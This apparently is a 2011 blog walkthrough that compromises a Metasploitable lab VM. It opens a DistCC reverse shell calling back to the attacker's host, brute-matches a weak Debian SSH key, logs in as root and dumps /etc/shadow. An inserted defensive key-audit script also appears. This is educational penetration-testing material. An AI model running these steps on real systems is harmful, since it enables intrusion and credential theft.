November 14, 2011

[VULNERABILITY] DistCC Daemon

A few days ago I ran a penetration test against the DistCC software using Metasploit, with a little help from ExploitDB.

Requirements:
  1. Metasploit Framework (metasploit.com/download)
  2. ExploitDB (www.exploitdb.com)
  3. The precomputed (guessable) Debian RSA key set (see the walkthrough below for the download link)
Tutorial:

  1. Get a shell on the DistCC server as the daemon user
  2. Find out which RSA public key the server trusts
  3. Log in as root using the matching guessable RSA key
Walkthrough:

root@blue-dragon:~# nmap -sS -sV -p1-65535 -f -n -vv 192.168.1.8



Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-11-14 10:01 WIT
NSE: Loaded 11 scripts for scanning.
Initiating ARP Ping Scan at 10:01
Scanning 192.168.1.8 [1 port]
Completed ARP Ping Scan at 10:01, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:01
Scanning 192.168.1.8 [65535 ports]
Discovered open port 22/tcp on 192.168.1.8
Discovered open port 80/tcp on 192.168.1.8
Discovered open port 53/tcp on 192.168.1.8
Discovered open port 25/tcp on 192.168.1.8
Discovered open port 21/tcp on 192.168.1.8
Discovered open port 3306/tcp on 192.168.1.8
Discovered open port 23/tcp on 192.168.1.8
Discovered open port 3632/tcp on 192.168.1.8
Discovered open port 8180/tcp on 192.168.1.8
Discovered open port 5432/tcp on 192.168.1.8
Completed SYN Stealth Scan at 10:01, 9.96s elapsed (65535 total ports)
Initiating Service scan at 10:01
Scanning 10 services on 192.168.1.8
Completed Service scan at 10:01, 21.02s elapsed (10 services on 1 host)
NSE: Script scanning 192.168.1.8.
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 192.168.1.8
Host is up (0.00040s latency).
Scanned at 2011-11-14 10:01:00 WIT for 31s
Not shown: 65524 closed ports
PORT     STATE    SERVICE    VERSION
21/tcp   open     ftp        ProFTPD 1.3.1
22/tcp   open     ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open     telnet     Linux telnetd
25/tcp   open     smtp       Postfix smtpd
53/tcp   open     domain     ISC BIND 9.4.2
80/tcp   open     http       Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
3306/tcp open     mysql      MySQL 5.0.51a-3ubuntu5
3632/tcp open     distccd    distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open     postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp filtered ajp13
8180/tcp open     http       Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:3C:99:68 (VMware)
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel


Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.36 seconds
           Raw packets sent: 66676 (2.934MB) | Rcvd: 65537 (2.622MB)



The scan shows that the server exposes DistCC on port 3632. Let's get a shell on it as the daemon user with Metasploit's help.

root@blue-dragon:~# msfconsole
msf > search distcc
msf > use exploit/unix/misc/distcc_exec
msf  exploit(distcc_exec) > set RHOST 192.168.1.8
msf  exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse_perl
msf  exploit(distcc_exec) > set LHOST 192.168.1.2
msf  exploit(distcc_exec) > show options 


Module options (exploit/unix/misc/distcc_exec):


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.8      yes       The target address
   RPORT  3632             yes       The target port




Payload options (cmd/unix/reverse_perl):


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address
   LPORT  4444             yes       The listen port




Exploit target:


   Id  Name
   --  ----
   0   Automatic Target



Exploit:

msf  exploit(distcc_exec) > exploit 


[*] Started reverse handler on 192.168.1.2:4444 
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.8:33625) at 2011-11-14 10:11:41 +0700


uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
daemon
ls -lart
total 16
drwxr-xr-x 21 root root 4096 Apr 28  2010 ..
drwxrwxrwt  2 root root 4096 Nov 13 11:04 .X11-unix
drwxrwxrwt  2 root root 4096 Nov 13 11:04 .ICE-unix
drwxrwxrwt  4 root root 4096 Nov 13 11:55 

ls -lart /root
total 32
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
-rw-r--r--  1 root root 2227 Oct 20  2007 .bashrc
-rwx------  1 root root  401 Apr 28  2010 reset_logs.sh
-rw-------  1 root root  187 Apr 28  2010 .lesshst
drwxr-xr-x 21 root root 4096 Apr 28  2010 ..
drwxr-xr-x  3 root root 4096 May 17  2010 .
drwxr-xr-x  2 root root 4096 May 17  2010 .ssh
-rw-------  1 root root  123 Nov 13 11:32 .bash_history
ls -lart /root/.ssh
total 12
drwxr-xr-x 3 root root 4096 May 17  2010 ..
drwxr-xr-x 2 root root 4096 May 17  2010 .
-rw-r--r-- 1 root root  405 May 17  2010 authorized_keys
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

The key blob we obtain is:
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w



Then search ExploitDB for openssl to find the weak-RSA-key exploit:


root@blue-dragon:~# cd /pentest/exploits/exploitdb/
root@blue-dragon:/pentest/exploits/exploitdb# ./searchsploit openssl
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)             /multiple/dos/146.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)             /linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit                        /multiple/dos/4773.pl
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)             /linux/remote/5720.py
OpenSSL <= 0.9.8k                                                           /multiple/dos/8720.c
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
OpenSSL remote DoS                                                          /linux/dos/12334.c
root@blue-dragon:/pentest/exploits/exploitdb# cat platforms/multiple/remote/5622.txt
the debian openssl issue leads that there are only 65.536 possible ssh 
keys generated, cause the only entropy is the pid of the process 
generating the key.


This leads to that the following perl script can be used with the 
precalculated ssh keys to brute force the ssh login. It works if such a 
keys is installed on a non-patched debian or any other system manual 
configured to.


On an unpatched system, which doesn't need to be debian, do the following:


keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2


[snip...]

Download the RSA key set from:
http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
or
http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

Extract it and grep the .pub files for the key recovered above.

root@blue-dragon:~/tools/rsa/2048# grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
57c3115d77c56390332dc5c49978627a-5429.pub
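The grep above checks one recovered key by hand against the precomputed set. As an added example (not part of the original post), the Python below does the same check from the administrator's side: it parses each ssh-rsa entry in an authorized_keys file, computes its OpenSSH SHA256 fingerprint and flags any entry whose fingerprint also appears in a set of known-weak .pub lines. The weak set and the authorized_keys file here are constructed toy values, not the real 2048-bit key set.

```python
import base64
import hashlib
import struct

def _read_string(buf, off):  # SSH wire 'string': 4-byte big-endian length, then bytes
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def parse_ssh_rsa(blob_b64):
    """Decode the base64 part of an 'ssh-rsa' line into the integers (e, n)."""
    raw = base64.b64decode(blob_b64)
    kind, off = _read_string(raw, 0)
    if kind != b"ssh-rsa":
        raise ValueError("not an ssh-rsa key: %r" % kind)
    e_bytes, off = _read_string(raw, off)
    n_bytes, _ = _read_string(raw, off)
    return int.from_bytes(e_bytes, "big"), int.from_bytes(n_bytes, "big")

def encode_ssh_rsa(e, n):
    """Inverse of parse_ssh_rsa; used only to build the constructed sample keys."""
    def mpint(x):  # big-endian, with an extra leading 0x00 if the high bit is set
        b = x.to_bytes((x.bit_length() + 8) // 8, "big")
        return struct.pack(">I", len(b)) + b
    return base64.b64encode(struct.pack(">I", 7) + b"ssh-rsa" + mpint(e) + mpint(n)).decode()

def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of the wire-encoded public key."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def audit(authorized_keys_text, weak_pub_lines):
    """Return [(comment, fingerprint, is_weak)] for every plain ssh-rsa entry."""
    weak = {fingerprint(l.split()[1]) for l in weak_pub_lines if l.startswith("ssh-rsa ")}
    report = []
    for line in authorized_keys_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0] != "ssh-rsa":
            continue  # comments, blank lines and option-prefixed entries are skipped
        fp = fingerprint(parts[1])
        report.append((parts[2] if len(parts) > 2 else "", fp, fp in weak))
    return report

# Constructed sample data: toy moduli stand in for the real 2048-bit weak key set.
WEAK_SET = ["ssh-rsa " + encode_ssh_rsa(35, 0xC7D3A1B5) + " weak-1.pub",
            "ssh-rsa " + encode_ssh_rsa(35, 0xE19F0C33) + " weak-2.pub"]
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed authorized_keys",
    "ssh-rsa " + encode_ssh_rsa(35, 0xE19F0C33) + " msfadmin@example",
    "ssh-rsa " + encode_ssh_rsa(65537, 0xB4D9F771) + " ops@example"])
```

On a real host, pass the contents of the .pub files from the downloaded archive as weak_pub_lines and run audit over every user's authorized_keys file in turn; any flagged entry should be removed and the key pair regenerated.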


Then log in over SSH using the private key that pairs with that .pub file (same file name without the .pub suffix).

root@blue-dragon:~/tools/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.8
Last login: Sun Nov 13 11:31:21 2011 from 192.168.1.2
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:~# cat /etc/issue
Ubuntu 8.04 \n \l

root@metasploitable:~# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
[snip...]


Written By
Blue Dragon

Supported By
Red Dragon


